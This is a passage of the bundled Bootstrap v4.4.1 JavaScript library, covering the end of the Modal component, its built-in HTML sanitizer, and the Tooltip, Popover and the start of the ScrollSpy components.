$(this._backdrop).addClass(ClassName$5.SHOW); if (!callback) { return; } if (!animate) { callback(); return; } var backdropTransitionDuration = Util.getTransitionDurationFromElement(this._backdrop); $(this._backdrop).one(Util.TRANSITION_END, callback).emulateTransitionEnd(backdropTransitionDuration); } else if (!this._isShown && this._backdrop) { $(this._backdrop).removeClass(ClassName$5.SHOW); var callbackRemove = function callbackRemove() { _this9._removeBackdrop(); if (callback) { callback(); } }; if ($(this._element).hasClass(ClassName$5.FADE)) { var _backdropTransitionDuration = Util.getTransitionDurationFromElement(this._backdrop); $(this._backdrop).one(Util.TRANSITION_END, callbackRemove).emulateTransitionEnd(_backdropTransitionDuration); } else { callbackRemove(); } } else if (callback) { callback(); } } // ---------------------------------------------------------------------- // the following methods are used to handle overflowing modals // todo (fat): these should probably be refactored out of modal.js // ---------------------------------------------------------------------- ; _proto._adjustDialog = function _adjustDialog() { var isModalOverflowing = this._element.scrollHeight > document.documentElement.clientHeight; if (!this._isBodyOverflowing && isModalOverflowing) { this._element.style.paddingLeft = this._scrollbarWidth + "px"; } if (this._isBodyOverflowing && !isModalOverflowing) { this._element.style.paddingRight = this._scrollbarWidth + "px"; } }; _proto._resetAdjustments = function _resetAdjustments() { this._element.style.paddingLeft = ''; this._element.style.paddingRight = ''; }; _proto._checkScrollbar = function _checkScrollbar() { var rect = document.body.getBoundingClientRect(); this._isBodyOverflowing = rect.left + rect.right < window.innerWidth; this._scrollbarWidth = this._getScrollbarWidth(); }; _proto._setScrollbar = function _setScrollbar() { var _this10 = this; if (this._isBodyOverflowing) { // Note: DOMNode.style.paddingRight returns the actual value or '' if not set // while $(DOMNode).css('padding-right') returns the calculated value or 0 if not set var fixedContent = [].slice.call(document.querySelectorAll(Selector$5.FIXED_CONTENT)); var stickyContent = [].slice.call(document.querySelectorAll(Selector$5.STICKY_CONTENT)); // Adjust fixed content padding $(fixedContent).each(function (index, element) { var actualPadding = element.style.paddingRight; var calculatedPadding = $(element).css('padding-right'); $(element).data('padding-right', actualPadding).css('padding-right', parseFloat(calculatedPadding) + _this10._scrollbarWidth + "px"); }); // Adjust sticky content margin $(stickyContent).each(function (index, element) { var actualMargin = element.style.marginRight; var calculatedMargin = $(element).css('margin-right'); $(element).data('margin-right', actualMargin).css('margin-right', parseFloat(calculatedMargin) - _this10._scrollbarWidth + "px"); }); // Adjust body padding var actualPadding = document.body.style.paddingRight; var calculatedPadding = $(document.body).css('padding-right'); $(document.body).data('padding-right', actualPadding).css('padding-right', parseFloat(calculatedPadding) + this._scrollbarWidth + "px"); } $(document.body).addClass(ClassName$5.OPEN); }; _proto._resetScrollbar = function _resetScrollbar() { // Restore fixed content padding var fixedContent = [].slice.call(document.querySelectorAll(Selector$5.FIXED_CONTENT)); $(fixedContent).each(function (index, element) { var padding = $(element).data('padding-right'); $(element).removeData('padding-right'); element.style.paddingRight = padding ? padding : ''; }); // Restore sticky content var elements = [].slice.call(document.querySelectorAll("" + Selector$5.STICKY_CONTENT)); $(elements).each(function (index, element) { var margin = $(element).data('margin-right'); if (typeof margin !== 'undefined') { $(element).css('margin-right', margin).removeData('margin-right'); } }); // Restore body padding var padding = $(document.body).data('padding-right'); $(document.body).removeData('padding-right'); document.body.style.paddingRight = padding ? padding : ''; }; _proto._getScrollbarWidth = function _getScrollbarWidth() { // thx d.walsh var scrollDiv = document.createElement('div'); scrollDiv.className = ClassName$5.SCROLLBAR_MEASURER; document.body.appendChild(scrollDiv); var scrollbarWidth = scrollDiv.getBoundingClientRect().width - scrollDiv.clientWidth; document.body.removeChild(scrollDiv); return scrollbarWidth; } // Static ; Modal._jQueryInterface = function _jQueryInterface(config, relatedTarget) { return this.each(function () { var data = $(this).data(DATA_KEY$5); var _config = _objectSpread2({}, Default$3, {}, $(this).data(), {}, typeof config === 'object' && config ? config : {}); if (!data) { data = new Modal(this, _config); $(this).data(DATA_KEY$5, data); } if (typeof config === 'string') { if (typeof data[config] === 'undefined') { throw new TypeError("No method named \"" + config + "\""); } data[config](relatedTarget); } else if (_config.show) { data.show(relatedTarget); } }); }; _createClass(Modal, null, [{ key: "VERSION", get: function get() { return VERSION$5; } }, { key: "Default", get: function get() { return Default$3; } }]); return Modal; }(); /** * ------------------------------------------------------------------------ * Data Api implementation * ------------------------------------------------------------------------ */ $(document).on(Event$5.CLICK_DATA_API, Selector$5.DATA_TOGGLE, function (event) { var _this11 = this; var target; var selector = Util.getSelectorFromElement(this); if (selector) { target = document.querySelector(selector); } var config = $(target).data(DATA_KEY$5) ? 'toggle' : _objectSpread2({}, $(target).data(), {}, $(this).data()); if (this.tagName === 'A' || this.tagName === 'AREA') { event.preventDefault(); } var $target = $(target).one(Event$5.SHOW, function (showEvent) { if (showEvent.isDefaultPrevented()) { // Only register focus restorer if modal will actually get shown return; } $target.one(Event$5.HIDDEN, function () { if ($(_this11).is(':visible')) { _this11.focus(); } }); }); Modal._jQueryInterface.call($(target), config, this); }); /** * ------------------------------------------------------------------------ * jQuery * ------------------------------------------------------------------------ */ $.fn[NAME$5] = Modal._jQueryInterface; $.fn[NAME$5].Constructor = Modal; $.fn[NAME$5].noConflict = function () { $.fn[NAME$5] = JQUERY_NO_CONFLICT$5; return Modal._jQueryInterface; }; /** * -------------------------------------------------------------------------- * Bootstrap (v4.4.1): tools/sanitizer.js * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) * -------------------------------------------------------------------------- */ var uriAttrs = ['background', 'cite', 'href', 'itemtype', 'longdesc', 'poster', 'src', 'xlink:href']; var ARIA_ATTRIBUTE_PATTERN = /^aria-[\w-]*$/i; var DefaultWhitelist = { // Global attributes allowed on any supplied element below. '*': ['class', 'dir', 'id', 'lang', 'role', ARIA_ATTRIBUTE_PATTERN], a: ['target', 'href', 'title', 'rel'], area: [], b: [], br: [], col: [], code: [], div: [], em: [], hr: [], h1: [], h2: [], h3: [], h4: [], h5: [], h6: [], i: [], img: ['src', 'alt', 'title', 'width', 'height'], li: [], ol: [], p: [], pre: [], s: [], small: [], span: [], sub: [], sup: [], strong: [], u: [], ul: [] }; /** * A pattern that recognizes a commonly useful subset of URLs that are safe. * * Shoutout to Angular 7 https://github.com/angular/angular/blob/7.2.4/packages/core/src/sanitization/url_sanitizer.ts */ var SAFE_URL_PATTERN = /^(?:(?:https?|mailto|ftp|tel|file):|[^&:/?#]*(?:[/?#]|$))/gi; /** * A pattern that matches safe data URLs. Only matches image, video and audio types. * * Shoutout to Angular 7 https://github.com/angular/angular/blob/7.2.4/packages/core/src/sanitization/url_sanitizer.ts */ var DATA_URL_PATTERN = /^data:(?:image\/(?:bmp|gif|jpeg|jpg|png|tiff|webp)|video\/(?:mpeg|mp4|ogg|webm)|audio\/(?:mp3|oga|ogg|opus));base64,[a-z0-9+/]+=*$/i; function allowedAttribute(attr, allowedAttributeList) { var attrName = attr.nodeName.toLowerCase(); if (allowedAttributeList.indexOf(attrName) !== -1) { if (uriAttrs.indexOf(attrName) !== -1) { return Boolean(attr.nodeValue.match(SAFE_URL_PATTERN) || attr.nodeValue.match(DATA_URL_PATTERN)); } return true; } var regExp = allowedAttributeList.filter(function (attrRegex) { return attrRegex instanceof RegExp; }); // Check if a regular expression validates the attribute. for (var i = 0, l = regExp.length; i < l; i++) { if (attrName.match(regExp[i])) { return true; } } return false; } function sanitizeHtml(unsafeHtml, whiteList, sanitizeFn) { if (unsafeHtml.length === 0) { return unsafeHtml; } if (sanitizeFn && typeof sanitizeFn === 'function') { return sanitizeFn(unsafeHtml); } var domParser = new window.DOMParser(); var createdDocument = domParser.parseFromString(unsafeHtml, 'text/html'); var whitelistKeys = Object.keys(whiteList); var elements = [].slice.call(createdDocument.body.querySelectorAll('*')); var _loop = function _loop(i, len) { var el = elements[i]; var elName = el.nodeName.toLowerCase(); if (whitelistKeys.indexOf(el.nodeName.toLowerCase()) === -1) { el.parentNode.removeChild(el); return "continue"; } var attributeList = [].slice.call(el.attributes); var whitelistedAttributes = [].concat(whiteList['*'] || [], whiteList[elName] || []); attributeList.forEach(function (attr) { if (!allowedAttribute(attr, whitelistedAttributes)) { el.removeAttribute(attr.nodeName); } }); }; for (var i = 0, len = elements.length; i < len; i++) { var _ret = _loop(i); if (_ret === "continue") continue; } return createdDocument.body.innerHTML; } /** * ------------------------------------------------------------------------ * Constants * ------------------------------------------------------------------------ */ var NAME$6 = 'tooltip'; var VERSION$6 = '4.4.1'; var DATA_KEY$6 = 'bs.tooltip'; var EVENT_KEY$6 = "." + DATA_KEY$6; var JQUERY_NO_CONFLICT$6 = $.fn[NAME$6]; var CLASS_PREFIX = 'bs-tooltip'; var BSCLS_PREFIX_REGEX = new RegExp("(^|\\s)" + CLASS_PREFIX + "\\S+", 'g'); var DISALLOWED_ATTRIBUTES = ['sanitize', 'whiteList', 'sanitizeFn']; var DefaultType$4 = { animation: 'boolean', template: 'string', title: '(string|element|function)', trigger: 'string', delay: '(number|object)', html: 'boolean', selector: '(string|boolean)', placement: '(string|function)', offset: '(number|string|function)', container: '(string|element|boolean)', fallbackPlacement: '(string|array)', boundary: '(string|element)', sanitize: 'boolean', sanitizeFn: '(null|function)', whiteList: 'object', popperConfig: '(null|object)' }; var AttachmentMap$1 = { AUTO: 'auto', TOP: 'top', RIGHT: 'right', BOTTOM: 'bottom', LEFT: 'left' }; var Default$4 = { animation: true, template: '

', trigger: 'hover focus', title: '', delay: 0, html: false, selector: false, placement: 'top', offset: 0, container: false, fallbackPlacement: 'flip', boundary: 'scrollParent', sanitize: true, sanitizeFn: null, whiteList: DefaultWhitelist, popperConfig: null }; var HoverState = { SHOW: 'show', OUT: 'out' }; var Event$6 = { HIDE: "hide" + EVENT_KEY$6, HIDDEN: "hidden" + EVENT_KEY$6, SHOW: "show" + EVENT_KEY$6, SHOWN: "shown" + EVENT_KEY$6, INSERTED: "inserted" + EVENT_KEY$6, CLICK: "click" + EVENT_KEY$6, FOCUSIN: "focusin" + EVENT_KEY$6, FOCUSOUT: "focusout" + EVENT_KEY$6, MOUSEENTER: "mouseenter" + EVENT_KEY$6, MOUSELEAVE: "mouseleave" + EVENT_KEY$6 }; var ClassName$6 = { FADE: 'fade', SHOW: 'show' }; var Selector$6 = { TOOLTIP: '.tooltip', TOOLTIP_INNER: '.tooltip-inner', ARROW: '.arrow' }; var Trigger = { HOVER: 'hover', FOCUS: 'focus', CLICK: 'click', MANUAL: 'manual' }; /** * ------------------------------------------------------------------------ * Class Definition * ------------------------------------------------------------------------ */ var Tooltip = /*#__PURE__*/ function () { function Tooltip(element, config) { if (typeof Popper === 'undefined') { throw new TypeError('Bootstrap\'s tooltips require Popper.js (https://popper.js.org/)'); } // private this._isEnabled = true; this._timeout = 0; this._hoverState = ''; this._activeTrigger = {}; this._popper = null; // Protected this.element = element; this.config = this._getConfig(config); this.tip = null; this._setListeners(); } // Getters var _proto = Tooltip.prototype; // Public _proto.enable = function enable() { this._isEnabled = true; }; _proto.disable = function disable() { this._isEnabled = false; }; _proto.toggleEnabled = function toggleEnabled() { this._isEnabled = !this._isEnabled; }; _proto.toggle = function toggle(event) { if (!this._isEnabled) { return; } if (event) { var dataKey = this.constructor.DATA_KEY; var context = $(event.currentTarget).data(dataKey); if (!context) { context = new this.constructor(event.currentTarget, this._getDelegateConfig()); $(event.currentTarget).data(dataKey, context); } context._activeTrigger.click = !context._activeTrigger.click; if (context._isWithActiveTrigger()) { context._enter(null, context); } else { context._leave(null, context); } } else { if ($(this.getTipElement()).hasClass(ClassName$6.SHOW)) { this._leave(null, this); return; } this._enter(null, this); } }; _proto.dispose = function dispose() { clearTimeout(this._timeout); $.removeData(this.element, this.constructor.DATA_KEY); $(this.element).off(this.constructor.EVENT_KEY); $(this.element).closest('.modal').off('hide.bs.modal', this._hideModalHandler); if (this.tip) { $(this.tip).remove(); } this._isEnabled = null; this._timeout = null; this._hoverState = null; this._activeTrigger = null; if (this._popper) { this._popper.destroy(); } this._popper = null; this.element = null; this.config = null; this.tip = null; }; _proto.show = function show() { var _this = this; if ($(this.element).css('display') === 'none') { throw new Error('Please use show on visible elements'); } var showEvent = $.Event(this.constructor.Event.SHOW); if (this.isWithContent() && this._isEnabled) { $(this.element).trigger(showEvent); var shadowRoot = Util.findShadowRoot(this.element); var isInTheDom = $.contains(shadowRoot !== null ? shadowRoot : this.element.ownerDocument.documentElement, this.element); if (showEvent.isDefaultPrevented() || !isInTheDom) { return; } var tip = this.getTipElement(); var tipId = Util.getUID(this.constructor.NAME); tip.setAttribute('id', tipId); this.element.setAttribute('aria-describedby', tipId); this.setContent(); if (this.config.animation) { $(tip).addClass(ClassName$6.FADE); } var placement = typeof this.config.placement === 'function' ? this.config.placement.call(this, tip, this.element) : this.config.placement; var attachment = this._getAttachment(placement); this.addAttachmentClass(attachment); var container = this._getContainer(); $(tip).data(this.constructor.DATA_KEY, this); if (!$.contains(this.element.ownerDocument.documentElement, this.tip)) { $(tip).appendTo(container); } $(this.element).trigger(this.constructor.Event.INSERTED); this._popper = new Popper(this.element, tip, this._getPopperConfig(attachment)); $(tip).addClass(ClassName$6.SHOW); // If this is a touch-enabled device we add extra // empty mouseover listeners to the body's immediate children; // only needed because of broken event delegation on iOS // https://www.quirksmode.org/blog/archives/2014/02/mouse_event_bub.html if ('ontouchstart' in document.documentElement) { $(document.body).children().on('mouseover', null, $.noop); } var complete = function complete() { if (_this.config.animation) { _this._fixTransition(); } var prevHoverState = _this._hoverState; _this._hoverState = null; $(_this.element).trigger(_this.constructor.Event.SHOWN); if (prevHoverState === HoverState.OUT) { _this._leave(null, _this); } }; if ($(this.tip).hasClass(ClassName$6.FADE)) { var transitionDuration = Util.getTransitionDurationFromElement(this.tip); $(this.tip).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration); } else { complete(); } } }; _proto.hide = function hide(callback) { var _this2 = this; var tip = this.getTipElement(); var hideEvent = $.Event(this.constructor.Event.HIDE); var complete = function complete() { if (_this2._hoverState !== HoverState.SHOW && tip.parentNode) { tip.parentNode.removeChild(tip); } _this2._cleanTipClass(); _this2.element.removeAttribute('aria-describedby'); $(_this2.element).trigger(_this2.constructor.Event.HIDDEN); if (_this2._popper !== null) { _this2._popper.destroy(); } if (callback) { callback(); } }; $(this.element).trigger(hideEvent); if (hideEvent.isDefaultPrevented()) { return; } $(tip).removeClass(ClassName$6.SHOW); // If this is a touch-enabled device we remove the extra // empty mouseover listeners we added for iOS support if ('ontouchstart' in document.documentElement) { $(document.body).children().off('mouseover', null, $.noop); } this._activeTrigger[Trigger.CLICK] = false; this._activeTrigger[Trigger.FOCUS] = false; this._activeTrigger[Trigger.HOVER] = false; if ($(this.tip).hasClass(ClassName$6.FADE)) { var transitionDuration = Util.getTransitionDurationFromElement(tip); $(tip).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration); } else { complete(); } this._hoverState = ''; }; _proto.update = function update() { if (this._popper !== null) { this._popper.scheduleUpdate(); } } // Protected ; _proto.isWithContent = function isWithContent() { return Boolean(this.getTitle()); }; _proto.addAttachmentClass = function addAttachmentClass(attachment) { $(this.getTipElement()).addClass(CLASS_PREFIX + "-" + attachment); }; _proto.getTipElement = function getTipElement() { this.tip = this.tip || $(this.config.template)[0]; return this.tip; }; _proto.setContent = function setContent() { var tip = this.getTipElement(); this.setElementContent($(tip.querySelectorAll(Selector$6.TOOLTIP_INNER)), this.getTitle()); $(tip).removeClass(ClassName$6.FADE + " " + ClassName$6.SHOW); }; _proto.setElementContent = function setElementContent($element, content) { if (typeof content === 'object' && (content.nodeType || content.jquery)) { // Content is a DOM node or a jQuery if (this.config.html) { if (!$(content).parent().is($element)) { $element.empty().append(content); } } else { $element.text($(content).text()); } return; } if (this.config.html) { if (this.config.sanitize) { content = sanitizeHtml(content, this.config.whiteList, this.config.sanitizeFn); } $element.html(content); } else { $element.text(content); } }; _proto.getTitle = function getTitle() { var title = this.element.getAttribute('data-original-title'); if (!title) { title = typeof this.config.title === 'function' ? this.config.title.call(this.element) : this.config.title; } return title; } // Private ; _proto._getPopperConfig = function _getPopperConfig(attachment) { var _this3 = this; var defaultBsConfig = { placement: attachment, modifiers: { offset: this._getOffset(), flip: { behavior: this.config.fallbackPlacement }, arrow: { element: Selector$6.ARROW }, preventOverflow: { boundariesElement: this.config.boundary } }, onCreate: function onCreate(data) { if (data.originalPlacement !== data.placement) { _this3._handlePopperPlacementChange(data); } }, onUpdate: function onUpdate(data) { return _this3._handlePopperPlacementChange(data); } }; return _objectSpread2({}, defaultBsConfig, {}, this.config.popperConfig); }; _proto._getOffset = function _getOffset() { var _this4 = this; var offset = {}; if (typeof this.config.offset === 'function') { offset.fn = function (data) { data.offsets = _objectSpread2({}, data.offsets, {}, _this4.config.offset(data.offsets, _this4.element) || {}); return data; }; } else { offset.offset = this.config.offset; } return offset; }; _proto._getContainer = function _getContainer() { if (this.config.container === false) { return document.body; } if (Util.isElement(this.config.container)) { return $(this.config.container); } return $(document).find(this.config.container); }; _proto._getAttachment = function _getAttachment(placement) { return AttachmentMap$1[placement.toUpperCase()]; }; _proto._setListeners = function _setListeners() { var _this5 = this; var triggers = this.config.trigger.split(' '); triggers.forEach(function (trigger) { if (trigger === 'click') { $(_this5.element).on(_this5.constructor.Event.CLICK, _this5.config.selector, function (event) { return _this5.toggle(event); }); } else if (trigger !== Trigger.MANUAL) { var eventIn = trigger === Trigger.HOVER ? _this5.constructor.Event.MOUSEENTER : _this5.constructor.Event.FOCUSIN; var eventOut = trigger === Trigger.HOVER ? _this5.constructor.Event.MOUSELEAVE : _this5.constructor.Event.FOCUSOUT; $(_this5.element).on(eventIn, _this5.config.selector, function (event) { return _this5._enter(event); }).on(eventOut, _this5.config.selector, function (event) { return _this5._leave(event); }); } }); this._hideModalHandler = function () { if (_this5.element) { _this5.hide(); } }; $(this.element).closest('.modal').on('hide.bs.modal', this._hideModalHandler); if (this.config.selector) { this.config = _objectSpread2({}, this.config, { trigger: 'manual', selector: '' }); } else { this._fixTitle(); } }; _proto._fixTitle = function _fixTitle() { var titleType = typeof this.element.getAttribute('data-original-title'); if (this.element.getAttribute('title') || titleType !== 'string') { this.element.setAttribute('data-original-title', this.element.getAttribute('title') || ''); this.element.setAttribute('title', ''); } }; _proto._enter = function _enter(event, context) { var dataKey = this.constructor.DATA_KEY; context = context || $(event.currentTarget).data(dataKey); if (!context) { context = new this.constructor(event.currentTarget, this._getDelegateConfig()); $(event.currentTarget).data(dataKey, context); } if (event) { context._activeTrigger[event.type === 'focusin' ? Trigger.FOCUS : Trigger.HOVER] = true; } if ($(context.getTipElement()).hasClass(ClassName$6.SHOW) || context._hoverState === HoverState.SHOW) { context._hoverState = HoverState.SHOW; return; } clearTimeout(context._timeout); context._hoverState = HoverState.SHOW; if (!context.config.delay || !context.config.delay.show) { context.show(); return; } context._timeout = setTimeout(function () { if (context._hoverState === HoverState.SHOW) { context.show(); } }, context.config.delay.show); }; _proto._leave = function _leave(event, context) { var dataKey = this.constructor.DATA_KEY; context = context || $(event.currentTarget).data(dataKey); if (!context) { context = new this.constructor(event.currentTarget, this._getDelegateConfig()); $(event.currentTarget).data(dataKey, context); } if (event) { context._activeTrigger[event.type === 'focusout' ? Trigger.FOCUS : Trigger.HOVER] = false; } if (context._isWithActiveTrigger()) { return; } clearTimeout(context._timeout); context._hoverState = HoverState.OUT; if (!context.config.delay || !context.config.delay.hide) { context.hide(); return; } context._timeout = setTimeout(function () { if (context._hoverState === HoverState.OUT) { context.hide(); } }, context.config.delay.hide); }; _proto._isWithActiveTrigger = function _isWithActiveTrigger() { for (var trigger in this._activeTrigger) { if (this._activeTrigger[trigger]) { return true; } } return false; }; _proto._getConfig = function _getConfig(config) { var dataAttributes = $(this.element).data(); Object.keys(dataAttributes).forEach(function (dataAttr) { if (DISALLOWED_ATTRIBUTES.indexOf(dataAttr) !== -1) { delete dataAttributes[dataAttr]; } }); config = _objectSpread2({}, this.constructor.Default, {}, dataAttributes, {}, typeof config === 'object' && config ? config : {}); if (typeof config.delay === 'number') { config.delay = { show: config.delay, hide: config.delay }; } if (typeof config.title === 'number') { config.title = config.title.toString(); } if (typeof config.content === 'number') { config.content = config.content.toString(); } Util.typeCheckConfig(NAME$6, config, this.constructor.DefaultType); if (config.sanitize) { config.template = sanitizeHtml(config.template, config.whiteList, config.sanitizeFn); } return config; }; _proto._getDelegateConfig = function _getDelegateConfig() { var config = {}; if (this.config) { for (var key in this.config) { if (this.constructor.Default[key] !== this.config[key]) { config[key] = this.config[key]; } } } return config; }; _proto._cleanTipClass = function _cleanTipClass() { var $tip = $(this.getTipElement()); var tabClass = $tip.attr('class').match(BSCLS_PREFIX_REGEX); if (tabClass !== null && tabClass.length) { $tip.removeClass(tabClass.join('')); } }; _proto._handlePopperPlacementChange = function _handlePopperPlacementChange(popperData) { var popperInstance = popperData.instance; this.tip = popperInstance.popper; this._cleanTipClass(); this.addAttachmentClass(this._getAttachment(popperData.placement)); }; _proto._fixTransition = function _fixTransition() { var tip = this.getTipElement(); var initConfigAnimation = this.config.animation; if (tip.getAttribute('x-placement') !== null) { return; } $(tip).removeClass(ClassName$6.FADE); this.config.animation = false; this.hide(); this.show(); this.config.animation = initConfigAnimation; } // Static ; Tooltip._jQueryInterface = function _jQueryInterface(config) { return this.each(function () { var data = $(this).data(DATA_KEY$6); var _config = typeof config === 'object' && config; if (!data && /dispose|hide/.test(config)) { return; } if (!data) { data = new Tooltip(this, _config); $(this).data(DATA_KEY$6, data); } if (typeof config === 'string') { if (typeof data[config] === 'undefined') { throw new TypeError("No method named \"" + config + "\""); } data[config](); } }); }; _createClass(Tooltip, null, [{ key: "VERSION", get: function get() { return VERSION$6; } }, { key: "Default", get: function get() { return Default$4; } }, { key: "NAME", get: function get() { return NAME$6; } }, { key: "DATA_KEY", get: function get() { return DATA_KEY$6; } }, { key: "Event", get: function get() { return Event$6; } }, { key: "EVENT_KEY", get: function get() { return EVENT_KEY$6; } }, { key: "DefaultType", get: function get() { return DefaultType$4; } }]); return Tooltip; }(); /** * ------------------------------------------------------------------------ * jQuery * ------------------------------------------------------------------------ */ $.fn[NAME$6] = Tooltip._jQueryInterface; $.fn[NAME$6].Constructor = Tooltip; $.fn[NAME$6].noConflict = function () { $.fn[NAME$6] = JQUERY_NO_CONFLICT$6; return Tooltip._jQueryInterface; }; /** * ------------------------------------------------------------------------ * Constants * ------------------------------------------------------------------------ */ var NAME$7 = 'popover'; var VERSION$7 = '4.4.1'; var DATA_KEY$7 = 'bs.popover'; var EVENT_KEY$7 = "." + DATA_KEY$7; var JQUERY_NO_CONFLICT$7 = $.fn[NAME$7]; var CLASS_PREFIX$1 = 'bs-popover'; var BSCLS_PREFIX_REGEX$1 = new RegExp("(^|\\s)" + CLASS_PREFIX$1 + "\\S+", 'g'); var Default$5 = _objectSpread2({}, Tooltip.Default, { placement: 'right', trigger: 'click', content: '', template: '' }); var DefaultType$5 = _objectSpread2({}, Tooltip.DefaultType, { content: '(string|element|function)' }); var ClassName$7 = { FADE: 'fade', SHOW: 'show' }; var Selector$7 = { TITLE: '.popover-header', CONTENT: '.popover-body' }; var Event$7 = { HIDE: "hide" + EVENT_KEY$7, HIDDEN: "hidden" + EVENT_KEY$7, SHOW: "show" + EVENT_KEY$7, SHOWN: "shown" + EVENT_KEY$7, INSERTED: "inserted" + EVENT_KEY$7, CLICK: "click" + EVENT_KEY$7, FOCUSIN: "focusin" + EVENT_KEY$7, FOCUSOUT: "focusout" + EVENT_KEY$7, MOUSEENTER: "mouseenter" + EVENT_KEY$7, MOUSELEAVE: "mouseleave" + EVENT_KEY$7 }; /** * ------------------------------------------------------------------------ * Class Definition * ------------------------------------------------------------------------ */ var Popover = /*#__PURE__*/ function (_Tooltip) { _inheritsLoose(Popover, _Tooltip); function Popover() { return _Tooltip.apply(this, arguments) || this; } var _proto = Popover.prototype; // Overrides _proto.isWithContent = function isWithContent() { return this.getTitle() || this._getContent(); }; _proto.addAttachmentClass = function addAttachmentClass(attachment) { $(this.getTipElement()).addClass(CLASS_PREFIX$1 + "-" + attachment); }; _proto.getTipElement = function getTipElement() { this.tip = this.tip || $(this.config.template)[0]; return this.tip; }; _proto.setContent = function setContent() { var $tip = $(this.getTipElement()); // We use append for html objects to maintain js events this.setElementContent($tip.find(Selector$7.TITLE), this.getTitle()); var content = this._getContent(); if (typeof content === 'function') { content = content.call(this.element); } this.setElementContent($tip.find(Selector$7.CONTENT), content); $tip.removeClass(ClassName$7.FADE + " " + ClassName$7.SHOW); } // Private ; _proto._getContent = function _getContent() { return this.element.getAttribute('data-content') || this.config.content; }; _proto._cleanTipClass = function _cleanTipClass() { var $tip = $(this.getTipElement()); var tabClass = $tip.attr('class').match(BSCLS_PREFIX_REGEX$1); if (tabClass !== null && tabClass.length > 0) { $tip.removeClass(tabClass.join('')); } } // Static ; Popover._jQueryInterface = function _jQueryInterface(config) { return this.each(function () { var data = $(this).data(DATA_KEY$7); var _config = typeof config === 'object' ? config : null; if (!data && /dispose|hide/.test(config)) { return; } if (!data) { data = new Popover(this, _config); $(this).data(DATA_KEY$7, data); } if (typeof config === 'string') { if (typeof data[config] === 'undefined') { throw new TypeError("No method named \"" + config + "\""); } data[config](); } }); }; _createClass(Popover, null, [{ key: "VERSION", // Getters get: function get() { return VERSION$7; } }, { key: "Default", get: function get() { return Default$5; } }, { key: "NAME", get: function get() { return NAME$7; } }, { key: "DATA_KEY", get: function get() { return DATA_KEY$7; } }, { key: "Event", get: function get() { return Event$7; } }, { key: "EVENT_KEY", get: function get() { return EVENT_KEY$7; } }, { key: "DefaultType", get: function get() { return DefaultType$5; } }]); return Popover; }(Tooltip); /** * ------------------------------------------------------------------------ * jQuery * ------------------------------------------------------------------------ */ $.fn[NAME$7] = Popover._jQueryInterface; $.fn[NAME$7].Constructor = Popover; $.fn[NAME$7].noConflict = function () { $.fn[NAME$7] = JQUERY_NO_CONFLICT$7; return Popover._jQueryInterface; }; /** * ------------------------------------------------------------------------ * Constants * ------------------------------------------------------------------------ */ var NAME$8 = 'scrollspy'; var VERSION$8 = '4.4.1'; var DATA_KEY$8 = 'bs.scrollspy'; var EVENT_KEY$8 = "." + DATA_KEY$8; var DATA_API_KEY$6 = '.data-api'; var JQUERY_NO_CONFLICT$8 = $.fn[NAME$8]; var Default$6 = { offset: 10, method: 'auto', target: '' }; var DefaultType$6 = { offset: 'number', method: 'string', target: '(string|element)' }; var Event$8 = { ACTIVATE: "activate" + EVENT_KEY$8, SCROLL: "scroll" + EVENT_KEY$8, LOAD_DATA_API: "load" + EVENT_KEY$8 + DATA_API_KEY$6 }; var ClassName$8 = { DROPDOWN_ITEM: 'dropdown-item', DROPDOWN_MENU: 'dropdown-menu', ACTIVE: 'active' }; var Selector$8 = { DATA_SPY: '[data-spy="scroll"]', ACTIVE: '.active', NAV_LIST_GROUP: '.nav, .list-group', NAV_LINKS: '.nav-link', NAV_ITEMS: '.nav-item', LIST_ITEMS: '.list-group-item', DROPDOWN: '.dropdown', DROPDOWN_ITEMS: '.dropdown-item', DROPDOWN_TOGGLE: '.dropdown-toggle' }; var OffsetMethod = { OFFSET: 'offset', POSITION: 'position' }; /** * ------------------------------------------------------------------------ * Class Definition * ------------------------------------------------------------------------ */ var ScrollSpy = /*#__PURE__*/ function () { function ScrollSpy(element, config) { var _this = this; this._element = element; this._scrollElement = element.tagName === 'BODY' ? window : element; this._config = this._getConfig(config); this._selector = this._config.target + " " + Selector$8.NAV_LINKS + "," + (this._config.target + " " + Selector$8.LIST_ITEMS + ",") + (this._config.target + " " + Selector$8.DROPDOWN_ITEMS); this._offsets = []; this._targets = []; this._activeTarget = null; this._scrollHeight = 0; $(this._scrollElement).on(Event$8.SCROLL, function (event) { return _this._process(event); }); this.refresh(); this._process(); } // Getters var _proto = ScrollSpy.prototype; // Public _proto.refresh = function refresh() { var _this2 = this; var autoMethod = this._scrollElement === this._scrollElement.window ? OffsetMethod.OFFSET : OffsetMethod.POSITION; var offsetMethod = this._config.method === 'auto' ? autoMethod : this._config.method; var offsetBase = offsetMethod === OffsetMethod.POSITION ? this._getScrollTop() : 0; this._offsets = []; this._targets = []; this._scrollHeight = this._getScrollHeight(); var targets = [].slice.call(document.querySelectorAll(this._selector)); targets.map(function (element) { var target; var targetSelector = Util.getSelectorFromElement(element); if (targetSelector) { target = document.querySelector(targetSelector); } if (target) { var targetBCR = target.getBoundingClientRect(); if (targetBCR.width || targetBCR.height) { // TODO (fat): remove sketch reliance on jQuery position/offset return [$(target)[offsetMethod]().top + offsetBase, targetSelector]; } } return null; }).filter(function (item) { return item; }).sort(function (a, b) { return a[0] - b[0]; }).forEach(function (item) { _this2._offsets.push(item[0]); _this2._targets.push(item[1]); }); }; _proto.dispose = function dispose() { $.removeData(this._element, DATA_KEY$8); $(this._scrollElement).off(EVENT_KEY$8); this._element = null; this._scrollElement = null; this._config = null; this._selector = null; this._offsets = null; this._targets = null; this._activeTarget = null; this._scrollHeight = null; } // Private ; _proto._getConfig = function _getConfig(config) { config = _objectSpread2({}, Default$6, {}, typeof config === 'object' && config ? config : {}); if (typeof config.target !== 'string') { var id = $(config.target).attr('id'); if (!id) { id = Util.getUID(NAME$8); $(config.target).attr('id', id); } config.target = "#" + id; } Util.typeCheckConfig(NAME$8, config, DefaultType$6); return config; }; _proto._getScrollTop = function _getScrollTop() { return this._scrollElement === window ? this._scrollElement.pageYOffset : this._scrollElement.scrollTop; }; _proto._getScrollHeight = function _getScrollHeight() { return this._scrollElement.scrollHeight || Math.max(document.body.scrollHeight, document.documentElement.scrollHeight); }; _proto._getOffsetHeight = function _getOffsetHeight() { return this._scrollElement === window ? window.innerHeight : this._scrollElement.getBoundingClientRect().height; }; _proto._process = function _process() { var scrollTop = this._getScrollTop() + this._config.offset; var 